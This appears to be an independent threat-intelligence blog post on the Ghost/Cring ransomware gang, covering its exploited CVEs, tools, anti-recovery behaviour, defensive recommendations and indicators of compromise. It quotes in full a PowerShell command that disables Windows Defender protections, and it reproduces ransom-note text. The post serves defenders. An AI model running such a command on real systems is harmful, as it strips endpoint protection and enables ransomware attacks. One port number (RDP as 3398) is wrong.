New Insights on the Ghost Ransomware Gang and their Peculiar Success
This cyber threat intelligence investigation hunts ghosts - seeking to answer why the Ghost/Cring ransomware gang is so successful at eluding security researchers and being profitable, especially when they avoid phishing in favor of targeting known-vulnerabilities in internet-facing systems.

This cyber threat intelligence investigation hunts ghosts - seeking to answer why the Ghost/Cring ransomware gang is so successful at eluding security researchers and being profitable, especially when they avoid phishing in favor of targeting known-vulnerabilities in internet-facing systems.
Created by SirPicklJohn (Ayden Parsons)


Why is the Ghost Ransomware Gang, in particular, so successful?
Introduction
I'm proud to present you with extensive insights and information, including original findings not included in the latest FBI/CISA/MS-ISAC advisory, on the Ghost/Cring ransomware gang! While reading articles on the group, I had one burning question that formed the basis of my following investigation:
Why is the Ghost ransomware gang, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?
For context, on February 19th, 2025, the FBI and CISA released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Reports and news articles say that Ghost has victims in over 70 countries, specifically exploits internet-facing applications/devices with known and unpatched vulnerabilities (some over a decade old!), and is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture (you will see why this group goes by so many different names - attribution has been incredibly difficult).
For the most intriguing and important part of my investigation, skip to the "What Makes Ghost Uniquely Successful?" section.
What Does Ghost Do Differently? How Does It Compare To Other Gangs?
First, Ghost has some direct contradictions to the typical tactics, techniques, and procedures (TTPs) of other modern ransomware gangs:
- Limited Data Exfiltration: Ghost threatens double-extortion (i.e., ransoming and threatening to leak stolen data), but there is no evidence suggesting that they actually exfiltrate that much data. When Ghost exfiltrates data, it has reportedly always been under 100 gigabytes (which, considering the amount of data that modern companies routinely store and process now, is not much). It is common behavior for ransomware gangs to regularly exfiltrate and leak terabytes of data, and sometimes, they even threaten triple extortion (which involves making threats directly to the end-users [students, patients, parents, etc.] who have had their data compromised in order to put pressure on the compromised organization to pay the ransom). However, Ghost primarily focuses on encrypting and ransoming their victims' data, targeting networks with less-robust security mechanisms, and severely impeding the victim's ability to defend, respond to, and recover from the attack.
- Inconsistency and Fluidity: Ghost does not limit itself to a set of defined ransomware payloads, file extensions, ransom notes, or ransom contact email addresses. Ghost has used the
Cring.exe
,Ghost.exe
,Elysium0.exe
,Elysium.exe
,ip.txt
(disguised EXE),NoNet.txt
(disguised EXE), andLocker.exe
executable ransomware payloads before, at least 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them. See the "Aggregated IoCs" section at the end of this report for these lists. - Minimal and Short Persistence, If Any At All: The FBI/CISA report detailed that "[p]ersistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day". While this led me to believe that Ghost was very unique for this speed, the "Time-To-Ransom" (TTR) measurement (i.e., the time it takes ransomware operators to deploy ransomware after initially gaining access) has actually been dropping among ransomware groups over the past few years. Thus, while Ghost is not particularly fast or slow when comparing their TTR with higher-profile ransomware gangs (which is a hard comparison to make, particularly as the FBI/CISA report does not give specific statistics, and interpreting those statistics definitively is difficult or impossible), it is still massively useful for security personnel to know that ransomware is trending towards ultra-low (<2 days) TTRs.
- Statistics to Support This: From 2022-2023, a frequently-cited Secureworks/Sophos report found that the median dwell time of ransomware operators had dropped from 4.5 days to just 1 day, with 10% of cases showing an even smaller dwell time of only five hours (linked source). Throughout 2024, Huntress Labs found that the average TTR of ransomware groups was 16.88 hours (ranging from an average of 4.22 to 43.42 hours, up to preference of the group as to whether they liked a more slow and deliberate or rapid smash-and-grab approach) (article link, direct PDF link).
- Lack of Domain Registration: Ghost is not known to register domains, and instead directly hardcode their C2 server's address in their payloads to download and execute Cobalt Strike Beacon malware. This is likely due to the short-lived nature/TTR of Ghost's operations, the desire to not leave a digital footprint, and the fact that Ghost does not typically use social engineering attacks or lookalike phishing domains to compromise its victims.
- Specifically Exploiting Known Vulnerabilities in Public-Facing Applications and Devices: While the earliest ransomware payloads from Cring (before it was known as Ghost) sometimes used phishing-based methods of delivery, at least according to old and potentially unreliable or generalized forums, the FBI and CISA have found that Ghost rarely uses social engineering or phishing tactics that are ubiquitous amongst cybercriminals and ransomware operators. Ghost strongly prefers to only target known, unpatched vulnerabilities in public-facing applications and devices, such as firewalls, RDP (port 3398), FortiGate VPN gateways, SMB (port 445), FTP (port 21), and end-of-life ColdFusion servers. The following CVE's are known to be exploited by Ghost:
- CVE-2018-13379
- CVE-2009-3960
- CVE-2010-2861
- CVE-2019-0604
- CVE-2019-5591 (source: Japanese Trend Micro Report)
- CVE-2020-12812 (source: Japanese Trend Micro Report)
- CVE-2021-34473 (Part of ProxyShell Attack Chain)
- CVE-2021-34523 (Part of ProxyShell Attack Chain)
- CVE-2021-31207 (Part of ProxyShell Attack Chain)
- Note that, in the autumn months before Ghost started operations in December 2020, there was a 6.7GB database of FortiGate VPN Gateway devices vulnerable to CVE-2018-13379. Ghost threat actors could have purchased this list, simply scanned IP addresses manually to identify vulnerable devices, or both.
What Makes Ghost Uniquely Successful?
This part of the report formed the crux of my investigation, where I not only sought to answer why Ghost was successful in terms of executing attacks and making a profit, but also in evading detection and making it hard to attribute activity to them - remember, this nebulous gang is known by eleven different names, and there still is a lot that isn't known about them!
My investigation suggested that all of the following factors, especially when working in tandem with each other, massively contribute to Ghost's success in both their profitability and their ability to give researchers and prosecutors a headache:
- Threatening double-extortion, while not actually exfiltrating that much data
- "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
- Tailoring attacks and demands to the victim
- Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars
- Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
- Short, minimal, or no persistence
- Lack of domain registration
- Defense evasion, disablement, and impersonation, combined with LOTL
- Anti-forensics and anti-system-recovery
- Anti-debugging/anti-reverse engineering
- Inconsistency and fluidity
- Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
- Specific targeting:
- Public-facing applications and devices
- Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
- Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
- Imitating/being imitated by other ransomware groups
Inconsistency and Fluidity + Imitating (or Being Imitated By?) Other Ransomware
The primary differentiator for Ghost that I immediately noticed was their deliberate inconsistency and rotation of the key elements in their attack chain (having used at least 5 different payloads, 9-26+ encrypted file extensions, 9 different ransom notes, and 41 different email addresses to contact them). This cripples the ability of security professionals to use hashes in their detection mechanisms, and has led to major difficulties in actually tracking and attributing Ghost's attack activity.
To highlight this, see the following screenshot of the thought process of the "discoverer" of Ghost/Cring, Amigo-A (Andrew Ivanov):
Also note the comparison to the Parasite ransomware. Parallels between the two threat actors are as follows (do note that there are likely several errors or "best guesses" made in these analyses. I am including this information to highlight the challenges that have been experienced in attributing activity to Ghost):
- Using Tutanota encrypted emails for communication with clients (as well as several cock.li addresses).
- Deleting volume shadow copies.
- One particular infection used the .vjiszy1lo extension for encrypted files and had a ransom (labelled "HOW_CAN_GET_FILES_BACK.txt") with two emails used by Ghost.
- This blog post (see image below) and this article by Amigo-A, which links several ransom note filenames and several extensions that Ghost is known to use to Parasite.
- The ransomware recovery company Elastio linked the .phantom extension, the "HOW_CAN_GET_FILES_BACK.txt/rtf" ransom note names, "Ghost.exe", and several emails to both Parasite and Ghost (see this link for Elastio's page on Parasite, and this link for the page on Ghost). There are likely errors or a lack of verification in Elastio's assessment, and I suspect they referenced Amigo-A's research/the BleepingComputer forum posts referenced throughout this article.
- These groups developed around the same time (Ghost emerged in December 2020, while Parasite is believed to have emerged January 2021).
Some possible explanations for these parallels are as follows:
- The researchers above could have made mistakes or didn't verify their sources before making these claims.
- Ghost could have links to Parasite, or they could be the same threat actor.
- Ghost and/or Parasite may have purposefully adopted some of the tactics/attributes of the other in order to make attribution harder.
Again, I include this information only to highlight the observed challenges in definitively attributing activity to Ghost.
Defense Evasion, Defense Deactivation, and Tool Choice (Including LOTL)
Another strong component of Ghost's success lies in their strong defense-evasion techniques. They use encoded PowerShell commands, Windows Command Shell commands, and the Windows Management Interface (WMI), which are all built-in to Windows systems and are commonly used for IT administration. Additionally, legitimate services like SMB and RDP are abused.
Ghost also heavily relies on Cobalt Strike (which uses HTTP/HTTPS and can blend in with legitimate traffic) and the following set of open source tools:
- IOX - Used as an open-source reverse proxy to a Ghost C2 server from a victim device on the network.
- Exploitation and Lateral Movement:
- Publicly-known and unpatched vulnerabilities that lead to initial access without user interaction
- Ladon 911 - Exploits two EternalBlue vulnerabilities (CVE-2017-0143 and 0144 in advisory MS17010)
- Enumeration:
- SharpShares.exe
- SpnDump.exe
- NBT.exe
- Privilege Escalation:
- SharpZeroLogon.exe - Used to exploit CVE-2020-1472 (escalation of privilege using MS-NRPC) against a Domain Controller.
- SharpGPPPass.exe - Attempts to exploit CVE-2014-1812
- BadPotato.exe
- God.exe (GodPotato)
- Persistence:
- Web Shell - Executes commands and facilitates persistent access
- Exfiltration:
- HFS (HTTP File Server)
See this list of tools and executables, with more details, in the joint-report from the FBI and CISA [pages 5-6]!
- HFS (HTTP File Server)
A common Ghost attack chain will include using Cobalt Strike to display a list of all running processes, using that to determine a running antivirus solution on the system, and then using a PowerShell command like the following to disable it (in this case, Windows Defender is being disabled):
Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.
However, what about EDR, IDPS, and SIEM? According to an analysis by Vectra.ai (linked here), Ghost's fast operation/TTR, abuse of legitimate applications, lack of long-term persistence, and other detection evasion methods are sufficient enough to bypass known attack signatures, rule-based detection, and even pattern-analysis/behavioral baselines.
Payload Behavior: Anti-Forensics, Anti-Debugging/RE, and Anti-System Recovery
Ghost's ransomware payloads employ several tactics that make it even harder for security analysts to detect and analyze them, while simultaneously disabling backup and recovery processes. Cross-referencing the MD5 hashes of Ghost's malware (as provided in the CISA/FBI security advisory) with the Hybrid Analysis database revealed the following anti-recovery behaviors:
- Deleting files with the "
.VHD
,.bac
,.bak
,.sbcat
,.bkf
,.set
,.win
, and.dsk
" extensions, which are all related to backups - Disabling the system's volume shadow copy service
- Deleting volume shadow copies
- Killing processes related to the Veritas backup solution, such as the
BMR Boot Service
andNetBackup BMR MTFTP Service
- Killing telemetry processes related to MS SQL Server, allowing database files to be encrypted
Source: Hybrid Analysis Report for c5d712f82d5d37bb284acd4468ab3533 (Cring.exe - labelled in Hybrid Analysis asfile
)
This sample also exhibited the following evasive mechanisms:
- Exhibiting MITRE ATT&CK technique T1055 (Process Injection) by allocating virtual memory in a separate live process (which could suggest privilege escalation and/or anti-detection behavior).
- Being programmed to sleep (take no action) for 1566804069 milliseconds (approximately 18 days) at some point in its execution, which could indicate anything from detection evasion, to hiding behavior when being analyzed, to facilitating communication with C2 servers (or, of course, something totally innocuous).
- Allocating memory with PAGE_GUARD access rights, which act as a one-time alarm to detect and protect against the memory page being accessed. In the context of malicious software, this could indicate that the malware is protecting from or detecting the usage of a debugger.
Finally, while I didn't see it in this sample, other ransomware payloads that Ghost has used also clear Windows Event Logs, in addition to the above activity.
(MD5 of kill.bat: fe0ccc3a60e1a5b27c055ec36e62e9e0)
Note that, according to Kaspersky's analysis (corroborated with what I saw from the Hybrid Analysis report), Ghost attacks have been observed to occur as follows:
- After gaining initial access, Ghost operators downloaded the "execute.bat" file in a temporary folder.
- "execute.bat" launches a PowerShell command under the name
kaspersky
, mimicking the antivirus running on the system. This command downloaded a file from a Ghost C2 server and saved it as C:\__output:(Note that, while the downloaded file was called
ip.txt
, it is actually the executable EXE ransomware payload. When connecting to the malware-hosting C2 server via a web browser, this file had been deleted and replaced with a newer ransomware payload calledNoNet.txt
)
- The downloaded malware created a batch file called
kill.bat
that executed the following series of actions: (details stated earlier in this section)- Stopped backup services (as done in the Hybrid Analysis report earlier).
- Stopped the SstpSvc service that creates VPN connections, making it so system administrators could not connect to the system via VPN and respond in a timely manner.
- Terminated application processes that could hinder file encryption (as done in the Hybrid Analysis report earlier with mspub and Oracle MyDesktop services).
- Deleted locally-stored backup files (as done in the Hybrid Analysis report earlier).
- Deleted itself.
- The malware started encrypting files with AES, with the encryption key in turn being encrypted with a hard-coded RSA public key of 8,192 bits.
- The malware dropped a ransom note.
Short, Minimal, or No Persistence ("Moving Quickly")
As mentioned earlier, Ghost avoids long-term persistence, and like many other modern and high-performing ransomware gangs, is trending towards a regularly low TTR ("Time-to-Ransom" from initial access) of mere hours or days. This rapid turnaround, combined with the other evasive mechanisms and tactics that Ghost employs, can make it difficult for security tools or analysts to collect and analyze data, detect abnormalities and identify malicious behavior, and then effectively respond.
I thought the following claim in an analysis by Vectra was incredibly thought-provoking:
"Traditional security is too slow - only AI can stop Ghost in time."
Despite being a biased transition into an audacious marketing statement for AI-powered behavioral analysis and automated response, I mention this quote because there is a lot of truth to it, and it uncomfortably paints a very real and developing picture of adversaries that are simply too fast for certain defenses to be effective.
Tailoring Attacks to the Victim and NOT Demanding Millions
Another reason why Ghost is so successful likely lies in how they tailor their attacks to victims on a case-by-case basis, which includes parameters ranging from impersonating the victim's security software (as mentioned earlier in the case study by Kaspersky) to the way they set the price-points of their ransom demands.
According to securityintelligence.com, the average ransom demand in 2024 rose to $2.73 million (from about $1 million in 2023), and the average ransom demand for healthcare organizations exceeded $5.2 million in the first half of 2024 (with high-profile incidents reaching over $20 million). However, there are many organizations that would have a really hard time forking out a million (or several million) dollars at the drop of a hat. Additionally, there are many organizations, like small to medium sized business/health practices, that simply would not be able to pay that much, that spontaneously. Forcing organizations into a corner like this can make them feel like they have no choice but to involve law enforcement and/or not pay the demand. As stated earlier, Ghost specifically demands "more reasonable" payments in the tens to hundreds of thousands of dollars, which organizations can justify paying much more.
Additionally, it has been cited that the impact of a Ghost ransomware attack varies significantly on a victim-by-victim basis. These deliberate and surgical attacks (combined with the earlier-mentioned disabling of backup/recovery methods) put victims in a situation where they have a much harder time refusing to pay a ransom.
Specific Targeting
Ghost only targets internet facing applications and devices that have known, unpatched vulnerabilities WHILE avoiding or moving on from segmented networks that prevent lateral movement. The following is a rundown of Ghost's targets:
- Seemingly indiscriminately-targeted VPNs, firewalls, and network appliances.
- All of the sectors that are typically the most profitable and consequential for ransomware operators to target (critical infrastructure, healthcare, schools and universities, government institutions, religious institutions, technology and manufacturing, and small-to-medium-sized businesses).
- Targets residing in 70+ countries. While Ghost is supposedly linked to China (diving more into their origins is out-of-scope of this report), they also target internet-facing Chinese systems all the same.
Communication via Encrypted Email Services and TOX
Most ransomware gangs post an onion link to the dark web (with an access key or username/password login) in their ransomware notes (see feeds like ransomlook.io for a list of ransomware gangs and their notes). In Ghost's ransomware notes, on the other hand, they typically provide 1-2 email addresses that are registered via encrypted email services like Proton Mail and Tutanota for victims to contact and start the payment/decryption process. A full list of 41-known emails (including 8 not in the FBI/CISA report) linked to Ghost are in the "Aggregated IoC's" section at the end of this report. Additionally, the CISA/FBI report mentioned that Ghost also uses the TOX peer-to-peer, end-to-end encrypted instant messaging and video-calling protocol/application. Some of their known TOX IDs are as follows:
EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA
E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B
Using encrypted email services contributes to Ghost's success in various ways:
- End-users will find it much easier to send a simple email, rather than setting up the TOR browser, accessing a .onion link, and logging into a web application.
- Email addresses cannot be hacked, taken over, or monitored like a web application on the Tor network can.
- Using a wide variety of encrypted email addresses makes attribution harder than hosting a .onion site. Additionally, it is easier to create, delete, and maintain email accounts than it is to do the same for web applications/websites on the Tor network.
- While administrators of the encrypted email communication services can take down Ghost's email addresses, it isn't an instantaneous process (typically requiring an abuse report with evidence provided by a victim, and then action taken on the part of the administrators) and doesn't compromise the anonymity of Ghost's operators.
Applications that use the TOX protocol (like qTox) offer similar benefits (and I suspect their peer-to-peer nature eliminates the concern of takedowns by administrators, but I cannot say this definitively because I do not have experience with TOX).
Limited Exfiltration (While Still Threatening Double-Extortion)
As mentioned earlier, Ghost threatens double-extortion, while not actually exfiltrating that much data (under 100 GB). This lends support to Ghost's success for a variety of reasons:
- Threatening double-extortion (leaking data to the public, which no backup solution or action by the victim can prevent after the data has been stolen) puts victims in a difficult position that makes it even more compelling for the ransom to be paid. Even if Ghost doesn't steal a relatively large amount of data as compared to other attacks, organizations still are forced to decide whether they can afford the risk of leakage, especially when they may not know exactly what data was stolen (with the safest assumption being to assume the worst).
- Exfiltration can be a noisy activity, and it is somewhat of an artform. There are many methods and mediums that an adversary can use for exfiltrating data, but exfiltrating less data generally reduces the opportunities for its detection. With Ghost's tendency to exfiltrate less than a hundred gigabytes in their attacks (rather than hundreds to thousands of terabytes, as seen in other attacks), this increases their stealthiness. While it cannot be stated for certain if this is Ghost's intention or not, it is just one of the many factors that either intentionally or coincidentally could help indicate why Ghost is so successful in their operations.
Side Note: Ghost's Nebulous Origins
First off, while many reports and articles say that Ghost was discovered in 2021, including the official FBI/CISA report, evidence shows that Ghost (known primarily as "Cring" back then) has been operating since at least December 9th, 2020, 12:49:07 (with another, less-verifiable source claiming December 7, 2020).
The most important source that corroborates this fact is the following Chinese web forum post:
This is trustworthy because it details one of the verified ransom note filenames ("deReadME!!!") and emails known to be used by Ghost. There are three sources that contain this post:
- https://www.ptt.cc/bbs/AntiVirus/M.1607489351.A.6BE.html
- https://www.webptt.com/cn.aspx?n=bbs/AntiVirus/M.1607489351.A.6BE.html
- http://www.ucptt.com/article/AntiVirus/1607489351/6BE (Note that this website does not support HTTPS)
Additionally, the following sources corroborate the start of Ghost's operations being in early December of 2020:
- The cited "discoverer" of the Ghost (back then known as Cring) ransomware, Amigo-A (Andrew Ivanov), stated this in both a forum post and his blog on the Ghost gang:
- "Активность этого крипто-вымогателя пришлась начало декабря 2020 - середину января 2021 г...Согласно информации от пострадавших от 7 декабря 2020, ранняя версия шифровала только файлы DOC и TXT." (source of blog excerpt)
- Translation by Reverso Context: "The activity of this crypto-extortionist occurred in early December 2020 - mid-January 2021. Aimed at English-speaking users, can spread around the world. It is reported that the victims of these attacks are industrial enterprises in some countries of Europe...According to information from the victims of December 7, 2020, the earlier version encrypted only DOC and TXT files."
- A report by Kaspersky that states the release date of the Cring ransomware family to be December 2020 (linked here).
How to Combat Ghost (Security Recommendations)
Recommended actions from CISA and Kaspersky:
- Make sure the components of all (endpoint) security solutions are enabled
- Implement network segmentation (e.g., via VLANs) to restrict lateral movement
- Keep the following fully updated:
- Internet-facing applications
- Antimalware databases
- Implement the principle of least privilege:
- Make Active Directory policies that allow users to only log into the workstations they need to
- Block connections to industrial systems that are not required by the industrial process
- Store backups on a system that is different than the one the backup is for
- Implement EDR-type solutions on all endpoints in all networks
- Implement advanced security solutions:
- Consider MDR/managed security solutions to leverage the knowledge and expertise of high-level security professionals
- Consider implementing (AI) behavioral analysis
- Implement allowlisting/whitelisting for applications, scripts, and network traffic
- Disable unnecessary ports
- Implement anti-phishing techniques (implement phishing-resistant MFA, a strong security education and awareness training program, and advanced email filtering)
My security recommendations that stem from the above research:
- Retire end-of-life servers, devices, and applications
- Periodically audit for out-of-date systems, for those not configured to receive auto-updates, and for those that are missing hardened security configurations
- Implement tamper protection on endpoint security solutions, if applicable
- Backup/aggregate local endpoint logs in a hardened centralized logging system
- Consider implementing behavioral analysis solutions
- Block PowerShell on computers that don't need it, at least flagging its usage on computers with users that don't need it
IoCs
Names:
- Ghost
- Cring
- Cring Hand
- Crypt3r
- Phantom
- Strike
- Hello
- Wickrme
- HsHarada
- Rapture
- RSA Virus
Contact Emails
For disclosure: the 33 emails provided in the CISA/FBI report are assumed to be verified. The above list is 41 emails large.
Services: Tutanota/Tutamail/Tuta.io, Skiff, Mailfence, OnionMail, ProtonMail, and potentially one from Cock.li
Payloads:
- Verified:
- cring.exe
- Ghost.exe
- Elysium0.exe
- Elysium.exe
- Locker.exe
- file.exe
- iex.txt, pro.txt (listed as IOX proxy IoCs from CISA)
- ip.txt
- NoNet.txt
- C:\__output.txt
- "Helper" Files:
- execute.bat
- kill.bat
- Unverified (and associated with the Parasite ransomware as well):
- 848299.exe
- SchoolPrject1.exe
Extensions
Verified:
- .cring
- .ghosts
- .RSA / .rsa
- .vjiszy1lo
- .phantom
- .VnBeHa99y
- Note: Verified from verified emails in the ransom note.
- .just4money
- .jpghosts
- Note: Verified from being associated in a forum with an attack that used a verified ransom note (HOW_CAN_GET_FILES_BACK.rtf).
- .pay4it
Semi-Verified: (based off of the verified email address with the same name) - .sg-ghosts
- .sgghosts
Unverified: (but associated with an unverified/unverifiable source that has verified information) - .BeHappy
- .D0ntW0rry
- .GetMoney
- .Gets
- .KrB3Ha99y
- .KrDontCry <- note that a Hybrid Analysis heuristics text match in an analysis of cring.exe has the message "DontCry :)"
- .Spanishghost
- .Welcomeghost
- .dkghost
- .rsaes <- note that this likely (and cheekily) refers to the RSA + AES algorithms used in encryption
- .ryuks
- .lldc
- .locked
- .sg-Geister
Totally Unverified and Unverifiable: (and unassociated with anything verifiable) - .4nMaJj
Ransom Notes:
-
!!!!WrReadMe!!!.rtf
Source: Kaspersky Cring Analysis Report (April 2021) -
!!!!deReadMe!!!.txt
Sorry, your network is encrypted, and encryption is achieved through RSA-8192, which means that the decryption service can only be provided by us. You cannot decrypt data through a security company. They will only contact us to pay the fee. We recommend that you pay 2 bitcoins directly to us , Or send two files to confirm whether we can decrypt, you need to deal with it as soon as possible, because the key file necessary for decryption will not be kept. Contact: [email protected] [email protected]
Source: HowToFix Guide on "The RSA/Cring Virus" (February 2021) -
Unknown Name
Oops, your computer is encrypted. You need to pay 2 bitcoins to decrypt the files you need. If you dont reply within three days, you wont be able to get the decryption service. Contact: qkhooks0708 @protonmail.com
Source: Heuristics text match in a Hybrid Analysis report for Cring.exe (MD5: c5d712f82d5d37bb284acd4468ab3533) (2021) -
deReadMe!!!.txt
Source: Sensors Tech Forum - Removing the Cring Ransomware (January 2023) -
!!!deReadMe!!!.rtf
Source: Japanese Trend Micro Report on Cring -
deReadME!!! "Notepad" (This is the oldest attack I could find from Ghost, traced back to December 9, 2020!)
Source: Three different articles to the same post on December 9th, 12:49:07, 2020: -
https://www.webptt.com/cn.aspx?n=bbs/AntiVirus/M.1607489351.A.6BE.html
-
http://www.ucptt.com/article/AntiVirus/1607489351/6BE (Note. UCPTT does not support a secure HTTPS connection)
-
HOW_TO_GET_FILES_BACK.txt
Source: BleepingComputer Forums (2021, March) -
HOW_CAN_GET_FILES_BACK.txt and HOW_CAN_GET_FILES_BACK.rtf
Sources: -
PCRisk Ghost Ransomware Overview and Removal Guide (December 2023)
-
BleepingComputer Forums (March 2021)
Another without a screenshot:
- HOW_CAN_RECOVERY.txt (it was attached in a BleepingComputer forum, but I could not get the access link to work)
REFERENCES
- "#StopRansomware: Ghost (Cring) Ransomware (PDF)" - FBI, CISA, and MS-ISAC Joint Advisory (2025, February 19)
- "#StopRansomware: Ghost (Cring) Ransomware (Website)" - CISA (2025, February 19)
- "ランサムウェア「Cring」の被害が国内で拡大、VPN脆弱性を狙い侵入" // "Ransomware 'Cring' spread in the country, intruding for VPN vulnerability" (Translation by Reverso Context) - (Japanese) Trend Micro (2021, May 20)
- "Ghost Ransomware: Striking Before You Even Know It’s There" - Vectra (2025, February 26)
- "Ghost ransomware virus - removal and decryption options" - PCrisk (2023, December 8)
- "Ransomware-Liste inkl. Decryptor (zum Entschlüsseln)" (German) (2024)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Cring Hand-Ransomware, Crypt3r Ransomware, Variants: CRING, RSA, Vjiszy1lo, Ghost, Phantom, VnBeHa99y, Pay4it" - (Russian) Amigo-A (2021, January 14)
- "Шифровальщики-вымогатели - The Digest "Crypto-Ransomware: Parasite Ransomware, Aliases: SharpCrypter, Paralock" - (Russian) Amigo-A (2021, January 4)
- "Ransomware Research - Cring" - elastio (n.d.)
- "Ransomware Research - Parasite" elastio (n.d.)
- "2022 年 6 月勒索病毒态势分析" - (Chinese) ioc.one (???) <- If you can find out more from this source, please let me know!
- "国家互联网应急中心(CNCERT/CC) - 勒索软件动态周报" - (Chinese Intelligence Report on Ransomware) (2022, June) <- Translated and summarized with GPT-4o via duck.ai, and with Reverso Context
- "Sectrio Malware Report" (2022) <- Only used in a rabbit hole I went down to see whether or not I could trust a different source that provided potential emails used by Ghost (like starmoon@my[.]com, bleepbloopbop@protonmail[.]com, and r3wuq@tuta[.]io). I found that I couldn't and these emails are likely not related to Ghost.
- "Unpatched vulnerable VPN servers hit by Cring ransomware" (2021, April 8)
- References this insightful Kaspersky report: "Vulnerability in FortiGate VPN servers is exploited in Cring ransomware attacks" (2021, April 7)
- "T1055 Process Injection" - MITRE ATT&CK (2023, March 30)
- "Services on NBU Clients" - Veritas (2011)
- "A new #Cring #Ransomware" - Amigo-A on Twitter/X (2021, January 21)
- "!!!!deReadMe!!!.txt" - Pastebin from Demonslay335 (one of the researchers related to the BleepingComputer forums that initially investigated Cring) (2021, January 26th)
- "What Are Malicious Newly Registered Domains?" - Palo Alto Networks (n.d.) <- Used, alongside AI, to determine what the advantages and drawbacks of a ransomware gang registering and hardcoding a domain versus an IP address are.
- "CISA and FBI Report Ghost Ransomware Breached 70 Countries" (2025, February 21)
- "FBI warns a cyber attack under way and you should back up your data" (2025, February 21)
- "FBI Says Backup Now - Advisory Warns Of Dangerous Ransomware Attacks" (2025, February 22)
- "Warning issued over prolific 'Ghost' ransomware group" (2025, February 24)
- "Cring Ransomware" - England National Health Service (2021, April 13) <- This initially led to a huge pivot off of the "Vjiszy1lo" name/alias associated with Ghost. Presumably the federal government will have done their due diligence and verified this information.
- "New Cring ransomware hits unpatched Fortinet VPN devices" (2021, April 7)
- "Cring ransomware group exploits ancient ColdFusion server" (2021, September 21)
- "Shadow-Pulse/Ransomlist.csv" (List of ransomware gangs, aliases, algorithms, etc.) <- Note that, despite the rich information, I cannot verify any of the information in this resource as-is.
- "Common TTPs of modern ransomware groups" - Kaspersky via Wayback Machine (2022) <- The only information utilized in this report was the graph that stated that Cring emerged in December 2020.
- "RSA Virus Files of Ransomware - How to remove Cring virus?" (2021, February 17) <- Do not download any tools from this article.
- "Remove Cring Ransomware" (2023, January 3) <- Do not download any tools from this article.
- "How to remove Cring Ransomware and decrypt .cring" (2021, February 17) <- ABSOLUTELY do not download any tools from this article. One of the first links is to Afflat3b2.com, a known distributor of malware and PUPs. (Article with more information on Afflat3b2)
- "xtaci/smux" (Stream Multiplexing Library for golang) <- Linked in analysis of cring.exe on Hybrid Analysis
- Ransomware Time-to-Ransom and Monetary Statistics:
- "2025 Cyber Threat Report" - Huntress (2025, February 5th) <- Note that the data for this report is from 2024.
- Linked from this article: "Dwell Time Reduced Further as Attacker Infect in Four Hours" (2025, February 17)
- "Ransomware Dwell Time Hits Low Of 24 Hours" Secureworks/Sophos (2023, October 5)
- "Roundup: The top ransomware stories of 2024"
- "2025 Cyber Threat Report" - Huntress (2025, February 5th) <- Note that the data for this report is from 2024.
- Other Parasite/Paras1te-specific sources: (used to determine links and distinctions between Ghost and Parasite)
- "Parasite ransomware targeting French users actively spreading in the wild" (2021, February 26)
- "Parasite Ransomware (.arazite)" (2021, May 3)
- "How to remove Paras1te ransomware from the infected machine" PCrisk (2021, November 7)
- "Paras1te Ransomware" (2021, February 10)
- BleepingComputer Forums:
- "Crypt3r (Cringe/Ghost/Cring) Ransomware (.cring, .phantom) Support Topic" (2021, January 19)
- "Ransomware infected, File extension.Pay4IT" (2021, April 10)
- "ransomware Cring Hand - Crypt3r" (2021, October 24)
- "MS17-010 - ETERNALBLUE - Exploit" (2020, January 22)
- ".vjiszy1lo extension, no ransom note." (2021, March 4)